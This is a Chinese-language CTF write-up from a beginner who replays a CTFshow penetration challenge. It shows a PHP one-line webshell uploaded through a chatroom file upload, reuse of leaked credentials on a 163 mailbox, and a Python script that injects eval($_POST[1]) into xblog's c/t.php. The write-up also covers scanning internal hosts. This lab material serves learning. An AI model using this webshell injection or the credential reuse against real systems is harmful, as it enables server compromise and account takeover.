CTFshow——RealWorldCTF渗透赛第二期·复现

一、匿名聊天室

匹配聊天后左下角有上传文件功能。

经测试是content-type检测，修改内容为一句话木马即可，文件被重命名但是不知道上传路径在哪。

点击首页的“查看帮助”，在GitHub中找到了源码。

对photo_upload.php进行审计，发现了上传路径为/images/photo/，把开始上传的一句话木马加上路径访问。

使用蚁剑成功连接，拿下第一台机器。

找到用户密码数据hacker_ctfshow@163.com/Hacker_ctfsh0w，以为是admin.php的账户密码，进入后台管理发现用处不大。

二、163邮箱

仔细观察可能是邮箱账号，尝试登录163邮箱成功，并有一封加密邮件。

通过弱口令123456破解邮件成功。

三、xblog开发

进入开发地址，是xblog源码。

审计源码，在c/t.php中，没有对$d进行过滤，存在上传漏洞。（这里自己审计不出来，感谢wp）

先登录https://blog.ctfer.com/a/获取cookie。

运行python脚本传入参数，得到文件名0.php，木马地址为p/0.php（这里python基础不好，代码为wp中的内容）

import requests



url = "https://blog.ctfer.com/c/t.php"

cookie={
        "PHPSESSID":"c43f3fb2ac045580e50a7f5b696c87fa"
}

data={
        "dat":'";eval($_POST[1]);?>',
        "title":"1",
        "content":"%20",
}

response = requests.post(url=url+"?type=submit",data=data,cookies=cookie)

print(response.text)

使用蚁剑连接，拿下第二台机器。

四、内网探测

查看网卡信息IP为192.168.102.3，并上传ping脚本探测是否有内网存活主机。

发现内网存活主机192.168.102.2

探测开放端口，发现8090开放

后续内网的横向渗透因为个人能力不足且没有vps就做不下去了，可以参考官方wp：https://ctf-show.feishu.cn/docx/RO1ydCc3Ko33tjxkGiNcTkM6n9b?share_token=150bb8d8-757f-4bbe-bf8d-029cee388dfc

总结：

自己还是太菜了，后面的代码审计和python脚本的编写基本都得看wp才能做下去，以及后续fastjson漏洞实现rce因为不了解Java无法复现。也让我知道了自己还有很长的路要走，得把代码审计和python这两个短板先补上。最后感谢群主搭建这个平台，让我这种刚学ctf的小白哪怕后面自己做不下去了也能参与进来！